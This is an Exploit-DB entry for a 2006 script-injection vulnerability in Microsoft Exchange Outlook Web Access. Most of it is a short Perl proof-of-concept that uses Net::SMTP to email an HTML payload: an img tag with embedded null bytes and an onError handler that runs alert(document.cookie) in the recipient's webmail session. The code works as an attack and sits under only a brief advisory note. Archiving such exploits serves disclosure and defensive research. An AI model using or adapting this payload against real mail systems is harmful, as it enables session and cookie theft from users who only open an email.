Microsoft Exchange Server 2000/2003 - Outlook Web Access Script Injection

EDB-ID:

28005




Platform:

Windows

Date:

2006-06-13


source: https://www.securityfocus.com/bid/18381/info

Microsoft Exchange Server Outlook Web Access is prone to a script-injection vulnerability.

A remote attacker can exploit this issue by sending a malicious email message to a vulnerable user.

#!/usr/bin/perl

 

use Net::SMTP;

 

my $to = "recipient\@domain.tld";

my $sub = "Watch out - Cross Site Scripting Attack";

my $from = "originator\@domain2.tld";

my $smtp = "mail.example.tld";

 

my $cont = "<img alt='hugo\0abc' src='http://www.example.com/

imagethatdoesnotexist.gif' onError='javascript:alert(document.cookie)'

alt='<s'\0";

 

$smtp = Net::SMTP->new($smtp);

$smtp->mail("$from") || die("error 1");

$smtp->to("$to") || die("error 2");

 

$smtp->data() ;

$smtp->datasend("To: $to\n") ;

$smtp->datasend("From: $from\n") ;

$smtp->datasend("Subject: $sub\n");

$smtp->datasend("Content-Type: text/html\n\n");

 

$smtp->datasend("$cont") ;

$smtp->datasend("\n\n") ;

$smtp->dataend() ;

$smtp->quit() ;

 

print "$cont\n\ndone\n";